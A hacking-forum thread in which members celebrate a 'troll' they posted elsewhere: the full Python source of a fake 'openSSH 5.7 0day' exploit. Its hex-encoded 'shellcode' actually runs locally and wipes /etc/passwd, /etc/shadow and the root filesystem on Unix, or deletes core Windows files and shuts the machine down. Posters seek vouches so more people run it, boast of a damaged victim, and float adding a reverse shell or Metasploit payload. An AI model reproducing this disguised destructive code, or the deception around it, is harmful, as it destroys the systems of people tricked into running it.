iExploit

Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!

Sign In Apply for Membership

Top Posters

Who's Online (0)

Powered by Vanilla. Made with Bootstrap.
Looking to introduce yourself? Look no further, and click here! We also have IRC! [irc.evilzone.org #iexploit]
The Thread Of Troll!
  • Sh3llc0d3
    Posts: 1,910
    Well when you thought the internet had seen all the troll'in it could, you were wrong!!!

    Chronic-"skid-slayer"-command posted the ultimate troll on HF tonight, a '0day SSH exploit' which to you and me deletes major system files using the shellcode...

    Link: http://tinyurl.com/66xfq9z


    [spoiler=Screenie 1]http://i52.tinypic.com/nb4spx.png[/spoiler]

    [spoiler=Screenie 2]http://i55.tinypic.com/2rrsysg.png[/spoiler]


    Source code ;)
    #!/usr/bin/python
    #openSSH 5.7 0day
    #greets to _st4ck3d*, x3n0n xin etc. You know who you are ;)
    import os, sys, socket
    nop = \"\x90\" #NOP(No OPeration)

    #Winblows shellcode - Length = 140
    shellcode_windows=(\"\x65\x63\x68\x6f\x20\x22\x2f\x62\x69\x6e\x2f\x73\x68\x22\x20\x26\x20\"
    \"\x65\x63\x68\x6f\x20\x22\x22\x20\x26\x20\x65\x63\x68\x6f\x20\x22\x53\x65\x67\x6d\"
    \"\x65\x6e\x74\x61\x74\x69\x6f\x6e\x20\x66\x61\x75\x6c\x74\x22\x20\x26\x20\x64\x65\"
    \"\x6c\x20\x25\x77\x69\x6e\x64\x69\x72\x25\x5c\x73\x79\x73\x74\x65\x6d\x33\x32\x5c\"
    \"\x68\x61\x6c\x2e\x64\x6c\x6c\x20\x26\x20\x64\x65\x6c\x20\x25\x77\x69\x6e\x64\x69\"
    \"\x72\x25\x5c\x73\x79\x73\x74\x65\x6d\x33\x32\x5c\x75\x73\x65\x72\x69\x6e\x69\x74\"
    \"\x2e\x65\x78\x65\x20\x26\x20\x73\x68\x75\x74\x64\x6f\x77\x6e\x20\x2d\x73\x20\x2d\"
    \"\x74\x20\x31\")


    #UNIX / Mac shellcode - Length = 86
    shellcode=(\"\x65\x63\x68\x6f\x20\x22\x22\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\"
    \"\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20\x3b\x20\x65\"
    \"\x63\x68\x6f\x20\x22\x22\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\"
    \"\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\"
    \"\x22\x22\x20\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\")


    def usage():
         print(\"Usage: ./exploit <IP> <port>\")
         print(\"Example: ./exploit 127.0.0.1 22\")

    def platformcheck():
        platform = os.name
        if platform == 'posix': #If platform is posix(for linux)
            isroot()
        elif platform == 'nt': #If platform is a windows platform
            winblows()
        elif platform == 'mac': #If platform is mac
            isroot()

    def winblows():
        print(\"Remember to run as ADMIN!!!!!!!\")
        if len(sys.argv) != 3:
            usage()
            sys.exit()
        else:
            host=sys.argv[1]
            port=int(sys.argv[2])
            print(\"\t[+]Connecting to host...\")
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)#Socket
            print(\"\t[+]Generating payload...\")
            derp = (nop * 1024 + \"\x44\" * 31788)
            derp += (\"\xeb\x14\") # JMP
            derp += (\"\x44\" * 6)
            derp += (\"\xad\xbb\xc3\x77\") # ECX 0x77C3BBAD
            derp += (\"\xb4\x73\xed\x77\") # EAX 0x77ED73B4
            derp += (nop * 21) #NOPS
            derp += shellcode_windows
            print(\"\t[+]Sending payload...\")
            s.connect((host,port)) #Connect to host
            s.send(derp)
            os.system(shellcode_windows)


    def isroot():
        ifroot = os.getuid()
        if ifroot != 0:
            print(\"[!!]Error: Must be run as root\n\")
            sys.exit()
        else:
            exploit()

    def exploit():
        if len(sys.argv) != 3:
            usage()
            sys.exit()
        else:
            host=sys.argv[1]
            port=int(sys.argv[2])
            print(\"\t[+]Connecting to host...\")
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            print(\"\t[+]Generating payload...\")
            derp = (nop * 1024 + \"\x44\" * 31788)
            derp += (\"\xeb\x14\") # JMP
            derp += (\"\x44\" * 6)
            derp += (\"\xad\xbb\xc3\x77\") # ECX 0x77C3BBAD
            derp += (\"\xb4\x73\xed\x77\") # EAX 0x77ED73B4
            derp += (nop * 21) #NOPS
            derp += shellcode
            print(\"\t[+]Sending payload...\")
            s.connect((host,port))
            s.send(derp)
            os.system(shellcode)

    platformcheck()


    And for people thinkin i'm running xchat as root it's a seperate account with escalated shell ;)
  • chroniccommand
    Posts: 1,389
    Epic wins. I need people to vouch in the thread so people run it. Please 5 star it + vouch for teh epic lulz :D

    EDIT: Some more lulzy screenies:
    [spoiler]http://img213.imageshack.us/img213/2690/201101251947371366x768s.png[/spoiler]
    [spoiler]http://img826.imageshack.us/img826/6338/201101251947491366x768s.png[/spoiler]
    [spoiler]http://img813.imageshack.us/img813/6240/201101252012401366x768s.png[/spoiler]
    [spoiler]http://img831.imageshack.us/img831/8543/201101252233271366x768s.png[/spoiler]
    ^Then I teamviewed him, reran it as admin and his computer restarted and there went my teamview connection. He hasn't been online since...

    [spoiler]http://img151.imageshack.us/img151/862/201101252309181366x768s.png[/spoiler]
    OH SHEEEET I've been spotted. Even though he left out the fact it fucks your machine up.
  • Xin
    Posts: 3,251
    Haha chronic thats hilarious, should have made some sort of reverse shell where you could 0wn them! :)
    Would have made for more lulz, i wander if our troll posts on that skiddy thread has had any feedback
    Xin
  • Sh3llc0d3
    Posts: 1,910
    said:


    Haha chronic thats hilarious, should have made some sort of reverse shell where you could 0wn them! :)
    Would have made for more lulz, i wander if our troll posts on that skiddy thread has had any feedback



    @chronic: told you he'd like it lol
  • chroniccommand
    Posts: 1,389
    said:


    said:


    Haha chronic thats hilarious, should have made some sort of reverse shell where you could 0wn them! :)
    Would have made for more lulz, i wander if our troll posts on that skiddy thread has had any feedback



    @chronic: told you he'd like it lol


    Lol everybody loves it because it's awesome. Although the back connect idea is a really good idea. Should have made it run a metasploit executable.[hr]
    Lol some more epic screenshots. I have officially been found out.
    [spoiler]http://img830.imageshack.us/img830/7406/201101261636431366x768s.png[/spoiler]
    [spoiler]http://img593.imageshack.us/img593/6672/201101261636501366x768s.png[/spoiler]
    [spoiler]http://img441.imageshack.us/img441/5905/201101261636571366x768s.png[/spoiler]
    [spoiler]http://img526.imageshack.us/img526/4664/201101261637101366x768s.png[/spoiler]
    [spoiler]http://img337.imageshack.us/img337/2065/201101261638251366x768s.png[/spoiler]
    Some dude made a thread about it lol
    http://www.hackforums.net/showthread.php?tid=1007521
    And now I have 8 rep. FTW lol.
    DOWN TO -1 FUCK YEA
    [spoiler]http://img823.imageshack.us/img823/9595/201101261649241366x768s.png[/spoiler]
  • undead
    Posts: 822
    YEAH!1! I'M A HACKER NOW! Th4nX!
    edit: my computer haz a viruzz!!
    edit 2: i'm crying! please how do i remove the viruzzzz!?!1??
Add a Comment